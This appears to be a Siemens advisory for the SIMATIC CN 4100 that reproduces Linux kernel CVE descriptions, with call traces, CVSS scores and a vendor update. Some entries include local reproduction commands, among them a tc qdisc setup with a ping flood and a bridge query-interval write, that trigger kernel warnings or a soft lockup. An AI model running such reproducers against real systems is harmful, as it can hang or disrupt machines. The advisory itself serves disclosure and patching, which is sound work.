vulnerability has been resolved: net/sched: Make cake_enqueue return NET_XMIT_CN when past buffer_limit The following setup can trigger a WARNING in htb_activate due to the condition: !cl->leaf.q->q.qlen tc qdisc del dev lo root tc qdisc add dev lo root handle 1: htb default 1 tc class add dev lo parent 1: classid 1:1 \ htb rate 64bit tc qdisc add dev lo parent 1:1 handle f: \ cake memlimit 1b ping -I lo -f -c1 -s64 -W0.001 127.0.0.1 This is because the low memlimit leads to a low buffer_limit, which causes packet dropping. However, cake_enqueue still returns NET_XMIT_SUCCESS, causing htb_enqueue to call htb_activate with an empty child qdisc. We should return NET_XMIT_CN when packets are dropped from the same tin and flow. I do not believe return value of NET_XMIT_CN is necessary for packet drops in the case of ack filtering, as that is meant to optimize performance, not to signal congestion. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39770 In the Linux kernel, the following vulnerability has been resolved: net: gso: Forbid IPv6 TSO with extensions on devices with only IPV6_CSUM When performing Generic Segmentation Offload (GSO) on an IPv6 packet that contains extension headers, the kernel incorrectly requests checksum offload if the egress device only advertises NETIF_F_IPV6_CSUM feature, which has a strict contract: it supports checksum offload only for plain TCP or UDP over IPv6 and explicitly does not support packets with extension headers. The current GSO logic violates this contract by failing to disable the feature for packets with extension headers, such as those used in GREoIPv6 tunnels. This violation results in the device being asked to perform an operation it cannot support, leading to a `skb_warn_bad_offload` warning and a collapse of network throughput. While device TSO/USO is correctly bypassed in favor of software GSO for these packets, the GSO stack must be explicitly told not to request checksum offload. Mask NETIF_F_IPV6_CSUM, NETIF_F_TSO6 and NETIF_F_GSO_UDP_L4 in gso_features_check if the IPv6 header contains extension headers to compute checksum in software. The exception is a BIG TCP extension, which, as stated in commit 68e068cabd2c6c53 ("net: reenable NETIF_F_IPV6_CSUM offload for BIG TCP packets"): "The feature is only enabled on devices that support BIG TCP TSO. The header is only present for PF_PACKET taps like tcpdump, and not transmitted by physical devices." kernel log output (truncated): WARNING: CPU: 1 PID: 5273 at net/core/dev.c:3535 skb_warn_bad_offload+0x81/0x140 ... Call Trace: skb_checksum_help+0x12a/0x1f0 validate_xmit_skb+0x1a3/0x2d0 validate_xmit_skb_list+0x4f/0x80 sch_direct_xmit+0x1a2/0x380 __dev_xmit_skb+0x242/0x670 __dev_queue_xmit+0x3fc/0x7f0 ip6_finish_output2+0x25e/0x5d0 ip6_finish_output+0x1fc/0x3f0 ip6_tnl_xmit+0x608/0xc00 [ip6_tunnel] ip6gre_tunnel_xmit+0x1c0/0x390 [ip6_gre] dev_hard_start_xmit+0x63/0x1c0 __dev_queue_xmit+0x6d0/0x7f0 ip6_finish_output2+0x214/0x5d0 ip6_finish_output+0x1fc/0x3f0 ip6_xmit+0x2ca/0x6f0 ip6_finish_output+0x1fc/0x3f0 ip6_xmit+0x2ca/0x6f0 inet6_csk_xmit+0xeb/0x150 __tcp_transmit_skb+0x555/0xa80 tcp_write_xmit+0x32a/0xe90 tcp_sendmsg_locked+0x437/0x1110 tcp_sendmsg+0x2f/0x50 ... skb linear: 00000000: e4 3d 1a 7d ec 30 e4 3d 1a 7e 5d 90 86 dd 60 0e skb linear: 00000010: 00 0a 1b 34 3c 40 20 11 00 00 00 00 00 00 00 00 skb linear: 00000020: 00 00 00 00 00 12 20 11 00 00 00 00 00 00 00 00 skb linear: 00000030: 00 00 00 00 00 11 2f 00 04 01 04 01 01 00 00 00 skb linear: 00000040: 86 dd 60 0e 00 0a 1b 00 06 40 20 23 00 00 00 00 skb linear: 00000050: 00 00 00 00 00 00 00 00 00 12 20 23 00 00 00 00 skb linear: 00000060: 00 00 00 00 00 00 00 00 00 11 bf 96 14 51 13 f9 skb linear: 00000070: ae 27 a0 a8 2b e3 80 18 00 40 5b 6f 00 00 01 01 skb linear: 00000080: 08 0a 42 d4 50 d5 4b 70 f8 1a View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-573 Improper Following of Specification by Caller Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39772 In the Linux kernel, the following vulnerability has been resolved: drm/hisilicon/hibmc: fix the hibmc loaded failed bug When hibmc loaded failed, the driver use hibmc_unload to free the resource, but the mutexes in mode.config are not init, which will access an NULL pointer. Just change goto statement to return, because hibnc_hw_init() doesn't need to free anything. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39773 In the Linux kernel, the following vulnerability has been resolved: net: bridge: fix soft lockup in br_multicast_query_expired() When set multicast_query_interval to a large value, the local variable 'time' in br_multicast_send_query() may overflow. If the time is smaller than jiffies, the timer will expire immediately, and then call mod_timer() again, which creates a loop and may trigger the following soft lockup issue. watchdog: BUG: soft lockup - CPU#1 stuck for 221s! [rb_consumer:66] CPU: 1 UID: 0 PID: 66 Comm: rb_consumer Not tainted 6.16.0+ #259 PREEMPT(none) Call Trace: __netdev_alloc_skb+0x2e/0x3a0 br_ip6_multicast_alloc_query+0x212/0x1b70 __br_multicast_send_query+0x376/0xac0 br_multicast_send_query+0x299/0x510 br_multicast_query_expired.constprop.0+0x16d/0x1b0 call_timer_fn+0x3b/0x2a0 __run_timers+0x619/0x950 run_timer_softirq+0x11c/0x220 handle_softirqs+0x18e/0x560 __irq_exit_rcu+0x158/0x1a0 sysvec_apic_timer_interrupt+0x76/0x90 This issue can be reproduced with: ip link add br0 type bridge echo 1 > /sys/class/net/br0/bridge/multicast_querier echo 0xffffffffffffffff > /sys/class/net/br0/bridge/multicast_query_interval ip link set dev br0 up The multicast_startup_query_interval can also cause this issue. Similar to the commit 99b40610956a ("net: bridge: mcast: add and enforce query interval minimum"), add check for the query interval maximum to fix this issue. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-667 Improper Locking Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39776 In the Linux kernel, the following vulnerability has been resolved: mm/debug_vm_pgtable: clear page table entries at destroy_args() The mm/debug_vm_pagetable test allocates manually page table entries for the tests it runs, using also its manually allocated mm_struct. That in itself is ok, but when it exits, at destroy_args() it fails to clear those entries with the *_clear functions. The problem is that leaves stale entries. If another process allocates an mm_struct with a pgd at the same address, it may end up running into the stale entry. This is happening in practice on a debug kernel with CONFIG_DEBUG_VM_PGTABLE=y, for example this is the output with some extra debugging I added (it prints a warning trace if pgtables_bytes goes negative, in addition to the warning at check_mm() function): [ 2.539353] debug_vm_pgtable: [get_random_vaddr ]: random_vaddr is 0x7ea247140000 [ 2.539366] kmem_cache info [ 2.539374] kmem_cachep 0x000000002ce82385 - freelist 0x0000000000000000 - offset 0x508 [ 2.539447] debug_vm_pgtable: [init_args ]: args->mm is 0x000000002267cc9e (...) [ 2.552800] WARNING: CPU: 5 PID: 116 at include/linux/mm.h:2841 free_pud_range+0x8bc/0x8d0 [ 2.552816] Modules linked in: [ 2.552843] CPU: 5 UID: 0 PID: 116 Comm: modprobe Not tainted 6.12.0-105.debug_vm2.el10.ppc64le+debug #1 VOLUNTARY [ 2.552859] Hardware name: IBM,9009-41A POWER9 (architected) 0x4e0202 0xf000005 of:IBM,FW910.00 (VL910_062) hv:phyp pSeries [ 2.552872] NIP: c0000000007eef3c LR: c0000000007eef30 CTR: c0000000003d8c90 [ 2.552885] REGS: c0000000622e73b0 TRAP: 0700 Not tainted (6.12.0-105.debug_vm2.el10.ppc64le+debug) [ 2.552899] MSR: 800000000282b033 CR: 24002822 XER: 0000000a [ 2.552954] CFAR: c0000000008f03f0 IRQMASK: 0 [ 2.552954] GPR00: c0000000007eef30 c0000000622e7650 c000000002b1ac00 0000000000000001 [ 2.552954] GPR04: 0000000000000008 0000000000000000 c0000000007eef30 ffffffffffffffff [ 2.552954] GPR08: 00000000ffff00f5 0000000000000001 0000000000000048 0000000000004000 [ 2.552954] GPR12: 00000003fa440000 c000000017ffa300 c0000000051d9f80 ffffffffffffffdb [ 2.552954] GPR16: 0000000000000000 0000000000000008 000000000000000a 60000000000000e0 [ 2.552954] GPR20: 4080000000000000 c0000000113af038 00007fffcf130000 0000700000000000 [ 2.552954] GPR24: c000000062a6a000 0000000000000001 8000000062a68000 0000000000000001 [ 2.552954] GPR28: 000000000000000a c000000062ebc600 0000000000002000 c000000062ebc760 [ 2.553170] NIP [c0000000007eef3c] free_pud_range+0x8bc/0x8d0 [ 2.553185] LR [c0000000007eef30] free_pud_range+0x8b0/0x8d0 [ 2.553199] Call Trace: [ 2.553207] [c0000000622e7650] [c0000000007eef30] free_pud_range+0x8b0/0x8d0 (unreliable) [ 2.553229] [c0000000622e7750] [c0000000007f40b4] free_pgd_range+0x284/0x3b0 [ 2.553248] [c0000000622e7800] [c0000000007f4630] free_pgtables+0x450/0x570 [ 2.553274] [c0000000622e78e0] [c0000000008161c0] exit_mmap+0x250/0x650 [ 2.553292] [c0000000622e7a30] [c0000000001b95b8] __mmput+0x98/0x290 [ 2.558344] [c0000000622e7a80] [c0000000001d1018] exit_mm+0x118/0x1b0 [ 2.558361] [c0000000622e7ac0] [c0000000001d141c] do_exit+0x2ec/0x870 [ 2.558376] [c0000000622e7b60] [c0000000001d1ca8] do_group_exit+0x88/0x150 [ 2.558391] [c0000000622e7bb0] [c0000000001d1db8] sys_exit_group+0x48/0x50 [ 2.558407] [c0000000622e7be0] [c00000000003d810] system_call_exception+0x1e0/0x4c0 [ 2.558423] [c0000000622e7e50] [c00000000000d05c] system_call_vectored_common+0x15c/0x2ec (...) [ 2.558892] ---[ end trace 0000000000000000 ]--- [ 2.559022] BUG: Bad rss-counter state mm:000000002267cc9e type:MM_ANONPAGES val:1 [ 2.559037] BUG: non-zero pgtables_bytes on freeing mm: -6144 Here the modprobe process ended up with an allocated mm_struct from the mm_struct slab that was used before by the debug_vm_pgtable test. That is not a problem, since the mm_stru ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39782 In the Linux kernel, the following vulnerability has been resolved: jbd2: prevent softlockup in jbd2_log_do_checkpoint() Both jbd2_log_do_checkpoint() and jbd2_journal_shrink_checkpoint_list() periodically release j_list_lock after processing a batch of buffers to avoid long hold times on the j_list_lock. However, since both functions contend for j_list_lock, the combined time spent waiting and processing can be significant. jbd2_journal_shrink_checkpoint_list() explicitly calls cond_resched() when need_resched() is true to avoid softlockups during prolonged operations. But jbd2_log_do_checkpoint() only exits its loop when need_resched() is true, relying on potentially sleeping functions like __flush_batch() or wait_on_buffer() to trigger rescheduling. If those functions do not sleep, the kernel may hit a softlockup. watchdog: BUG: soft lockup - CPU#3 stuck for 156s! [kworker/u129:2:373] CPU: 3 PID: 373 Comm: kworker/u129:2 Kdump: loaded Not tainted 6.6.0+ #10 Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.27 06/13/2017 Workqueue: writeback wb_workfn (flush-7:2) pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : native_queued_spin_lock_slowpath+0x358/0x418 lr : jbd2_log_do_checkpoint+0x31c/0x438 [jbd2] Call trace: native_queued_spin_lock_slowpath+0x358/0x418 jbd2_log_do_checkpoint+0x31c/0x438 [jbd2] __jbd2_log_wait_for_space+0xfc/0x2f8 [jbd2] add_transaction_credits+0x3bc/0x418 [jbd2] start_this_handle+0xf8/0x560 [jbd2] jbd2__journal_start+0x118/0x228 [jbd2] __ext4_journal_start_sb+0x110/0x188 [ext4] ext4_do_writepages+0x3dc/0x740 [ext4] ext4_writepages+0xa4/0x190 [ext4] do_writepages+0x94/0x228 __writeback_single_inode+0x48/0x318 writeback_sb_inodes+0x204/0x590 __writeback_inodes_wb+0x54/0xf8 wb_writeback+0x2cc/0x3d8 wb_do_writeback+0x2e0/0x2f8 wb_workfn+0x80/0x2a8 process_one_work+0x178/0x3e8 worker_thread+0x234/0x3b8 kthread+0xf0/0x108 ret_from_fork+0x10/0x20 So explicitly call cond_resched() in jbd2_log_do_checkpoint() to avoid softlockup. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39783 In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: Fix configfs group list head handling Doing a list_del() on the epf_group field of struct pci_epf_driver in pci_epf_remove_cfs() is not correct as this field is a list head, not a list entry. This list_del() call triggers a KASAN warning when an endpoint function driver which has a configfs attribute group is torn down: ================================================================== BUG: KASAN: slab-use-after-free in pci_epf_remove_cfs+0x17c/0x198 Write of size 8 at addr ffff00010f4a0d80 by task rmmod/319 CPU: 3 UID: 0 PID: 319 Comm: rmmod Not tainted 6.16.0-rc2 #1 NONE Hardware name: Radxa ROCK 5B (DT) Call trace: show_stack+0x2c/0x84 (C) dump_stack_lvl+0x70/0x98 print_report+0x17c/0x538 kasan_report+0xb8/0x190 __asan_report_store8_noabort+0x20/0x2c pci_epf_remove_cfs+0x17c/0x198 pci_epf_unregister_driver+0x18/0x30 nvmet_pci_epf_cleanup_module+0x24/0x30 [nvmet_pci_epf] __arm64_sys_delete_module+0x264/0x424 invoke_syscall+0x70/0x260 el0_svc_common.constprop.0+0xac/0x230 do_el0_svc+0x40/0x58 el0_svc+0x48/0xdc el0t_64_sync_handler+0x10c/0x138 el0t_64_sync+0x198/0x19c ... Remove this incorrect list_del() call from pci_epf_remove_cfs(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39787 In the Linux kernel, the following vulnerability has been resolved: soc: qcom: mdt_loader: Ensure we don't read past the ELF header When the MDT loader is used in remoteproc, the ELF header is sanitized beforehand, but that's not necessary the case for other clients. Validate the size of the firmware buffer to ensure that we don't read past the end as we iterate over the header. e_phentsize and e_shentsize are validated as well, to ensure that the assumptions about step size in the traversal are valid. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39788 In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: exynos: Fix programming of HCI_UTRL_NEXUS_TYPE On Google gs101, the number of UTP transfer request slots (nutrs) is 32, and in this case the driver ends up programming the UTRL_NEXUS_TYPE incorrectly as 0. This is because the left hand side of the shift is 1, which is of type int, i.e. 31 bits wide. Shifting by more than that width results in undefined behaviour. Fix this by switching to the BIT() macro, which applies correct type casting as required. This ensures the correct value is written to UTRL_NEXUS_TYPE (0xffffffff on gs101), and it also fixes a UBSAN shift warning: UBSAN: shift-out-of-bounds in drivers/ufs/host/ufs-exynos.c:1113:21 shift exponent 32 is too large for 32-bit type 'int' For consistency, apply the same change to the nutmrs / UTMRL_NEXUS_TYPE write. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39790 In the Linux kernel, the following vulnerability has been resolved: bus: mhi: host: Detect events pointing to unexpected TREs When a remote device sends a completion event to the host, it contains a pointer to the consumed TRE. The host uses this pointer to process all of the TREs between it and the host's local copy of the ring's read pointer. This works when processing completion for chained transactions, but can lead to nasty results if the device sends an event for a single-element transaction with a read pointer that is multiple elements ahead of the host's read pointer. For instance, if the host accesses an event ring while the device is updating it, the pointer inside of the event might still point to an old TRE. If the host uses the channel's xfer_cb() to directly free the buffer pointed to by the TRE, the buffer will be double-freed. This behavior was observed on an ep that used upstream EP stack without 'commit 6f18d174b73d ("bus: mhi: ep: Update read pointer only after buffer is written")'. Where the device updated the events ring pointer before updating the event contents, so it left a window where the host was able to access the stale data the event pointed to, before the device had the chance to update them. The usual pattern was that the host received an event pointing to a TRE that is not immediately after the last processed one, so it got treated as if it was a chained transaction, processing all of the TREs in between the two read pointers. This commit aims to harden the host by ensuring transactions where the event points to a TRE that isn't local_rp + 1 are chained. [mani: added stable tag and reworded commit message] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-415 Double Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.7 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVE-2025-39794 In the Linux kernel, the following vulnerability has been resolved: ARM: tegra: Use I/O memcpy to write to IRAM Kasan crashes the kernel trying to check boundaries when using the normal memcpy. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2025-39795 In the Linux kernel, the following vulnerability has been resolved: block: avoid possible overflow for chunk_sectors check in blk_stack_limits() In blk_stack_limits(), we check that the t->chunk_sectors value is a multiple of the t->physical_block_size value. However, by finding the chunk_sectors value in bytes, we may overflow the unsigned int which holds chunk_sectors, so change the check to be based on sectors. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39798 In the Linux kernel, the following vulnerability has been resolved: NFS: Fix the setting of capabilities when automounting a new filesystem Capabilities cannot be inherited when we cross into a new filesystem. They need to be reset to the minimal defaults, and then probed for again. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-273 Improper Check for Dropped Privileges Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39800 In the Linux kernel, the following vulnerability has been resolved: btrfs: abort transaction on unexpected eb generation at btrfs_copy_root() If we find an unexpected generation for the extent buffer we are cloning at btrfs_copy_root(), we just WARN_ON() and don't error out and abort the transaction, meaning we allow to persist metadata with an unexpected generation. Instead of warning only, abort the transaction and return -EUCLEAN. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39801 In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: Remove WARN_ON for device endpoint command timeouts This commit addresses a rarely observed endpoint command timeout which causes kernel panic due to warn when 'panic_on_warn' is enabled and unnecessary call trace prints when 'panic_on_warn' is disabled. It is seen during fast software-controlled connect/disconnect testcases. The following is one such endpoint command timeout that we observed: 1. Connect ======= ->dwc3_thread_interrupt ->dwc3_ep0_interrupt ->configfs_composite_setup ->composite_setup ->usb_ep_queue ->dwc3_gadget_ep0_queue ->__dwc3_gadget_ep0_queue ->__dwc3_ep0_do_control_data ->dwc3_send_gadget_ep_cmd 2. Disconnect ========== ->dwc3_thread_interrupt ->dwc3_gadget_disconnect_interrupt ->dwc3_ep0_reset_state ->dwc3_ep0_end_control_data ->dwc3_send_gadget_ep_cmd In the issue scenario, in Exynos platforms, we observed that control transfers for the previous connect have not yet been completed and end transfer command sent as a part of the disconnect sequence and processing of USB_ENDPOINT_HALT feature request from the host timeout. This maybe an expected scenario since the controller is processing EP commands sent as a part of the previous connect. It maybe better to remove WARN_ON in all places where device endpoint commands are sent to avoid unnecessary kernel panic due to warn. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39806 In the Linux kernel, the following vulnerability has been resolved: HID: multitouch: fix slab out-of-bounds access in mt_report_fixup() A malicious HID device can trigger a slab out-of-bounds during mt_report_fixup() by passing in report descriptor smaller than 607 bytes. mt_report_fixup() attempts to patch byte offset 607 of the descriptor with 0x25 by first checking if byte offset 607 is 0x15 however it lacks bounds checks to verify if the descriptor is big enough before conducting this check. Fix this bug by ensuring the descriptor size is at least 608 bytes before accessing it. Below is the KASAN splat after the out of bounds access happens: [ 13.671954] ================================================================== [ 13.672667] BUG: KASAN: slab-out-of-bounds in mt_report_fixup+0x103/0x110 [ 13.673297] Read of size 1 at addr ffff888103df39df by task kworker/0:1/10 [ 13.673297] [ 13.673297] CPU: 0 UID: 0 PID: 10 Comm: kworker/0:1 Not tainted 6.15.0-00005-gec5d573d83f4-dirty #3 [ 13.673297] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/04 [ 13.673297] Call Trace: [ 13.673297] [ 13.673297] dump_stack_lvl+0x5f/0x80 [ 13.673297] print_report+0xd1/0x660 [ 13.673297] kasan_report+0xe5/0x120 [ 13.673297] __asan_report_load1_noabort+0x18/0x20 [ 13.673297] mt_report_fixup+0x103/0x110 [ 13.673297] hid_open_report+0x1ef/0x810 [ 13.673297] mt_probe+0x422/0x960 [ 13.673297] hid_device_probe+0x2e2/0x6f0 [ 13.673297] really_probe+0x1c6/0x6b0 [ 13.673297] __driver_probe_device+0x24f/0x310 [ 13.673297] driver_probe_device+0x4e/0x220 [ 13.673297] __device_attach_driver+0x169/0x320 [ 13.673297] bus_for_each_drv+0x11d/0x1b0 [ 13.673297] __device_attach+0x1b8/0x3e0 [ 13.673297] device_initial_probe+0x12/0x20 [ 13.673297] bus_probe_device+0x13d/0x180 [ 13.673297] device_add+0xe3a/0x1670 [ 13.673297] hid_add_device+0x31d/0xa40 [...] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39808 In the Linux kernel, the following vulnerability has been resolved: HID: hid-ntrig: fix unable to handle page fault in ntrig_report_version() in ntrig_report_version(), hdev parameter passed from hid_probe(). sending descriptor to /dev/uhid can make hdev->dev.parent->parent to null if hdev->dev.parent->parent is null, usb_dev has invalid address(0xffffffffffffff58) that hid_to_usb_dev(hdev) returned when usb_rcvctrlpipe() use usb_dev,it trigger page fault error for address(0xffffffffffffff58) add null check logic to ntrig_report_version() before calling hid_to_usb_dev() View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39812 In the Linux kernel, the following vulnerability has been resolved: sctp: initialize more fields in sctp_v6_from_sk() syzbot found that sin6_scope_id was not properly initialized, leading to undefined behavior. Clear sin6_scope_id and sin6_flowinfo. BUG: KMSAN: uninit-value in __sctp_v6_cmp_addr+0x887/0x8c0 net/sctp/ipv6.c:649 __sctp_v6_cmp_addr+0x887/0x8c0 net/sctp/ipv6.c:649 sctp_inet6_cmp_addr+0x4f2/0x510 net/sctp/ipv6.c:983 sctp_bind_addr_conflict+0x22a/0x3b0 net/sctp/bind_addr.c:390 sctp_get_port_local+0x21eb/0x2440 net/sctp/socket.c:8452 sctp_get_port net/sctp/socket.c:8523 [inline] sctp_listen_start net/sctp/socket.c:8567 [inline] sctp_inet_listen+0x710/0xfd0 net/sctp/socket.c:8636 __sys_listen_socket net/socket.c:1912 [inline] __sys_listen net/socket.c:1927 [inline] __do_sys_listen net/socket.c:1932 [inline] __se_sys_listen net/socket.c:1930 [inline] __x64_sys_listen+0x343/0x4c0 net/socket.c:1930 x64_sys_call+0x271d/0x3e20 arch/x86/include/generated/asm/syscalls_64.h:51 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd9/0x210 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Local variable addr.i.i created at: sctp_get_port net/sctp/socket.c:8515 [inline] sctp_listen_start net/sctp/socket.c:8567 [inline] sctp_inet_listen+0x650/0xfd0 net/sctp/socket.c:8636 __sys_listen_socket net/socket.c:1912 [inline] __sys_listen net/socket.c:1927 [inline] __do_sys_listen net/socket.c:1932 [inline] __se_sys_listen net/socket.c:1930 [inline] __x64_sys_listen+0x343/0x4c0 net/socket.c:1930 View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39813 In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix potential warning in trace_printk_seq during ftrace_dump When calling ftrace_dump_one() concurrently with reading trace_pipe, a WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race condition. The issue occurs because: CPU0 (ftrace_dump) CPU1 (reader) echo z > /proc/sysrq-trigger !trace_empty(&iter) trace_iterator_reset(&iter) = s->seq.size) In the context between trace_empty() and trace_find_next_entry_inc() during ftrace_dump, the ring buffer data was consumed by other readers. This caused trace_find_next_entry_inc to return NULL, failing to populate `iter.seq`. At this point, due to the prior trace_iterator_reset, both `iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal, the WARN_ON_ONCE condition is triggered. Move the trace_printk_seq() into the if block that checks to make sure the return value of trace_find_next_entry_inc() is non-NULL in ftrace_dump_one(), ensuring the 'iter.seq' is properly populated before subsequent operations. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant 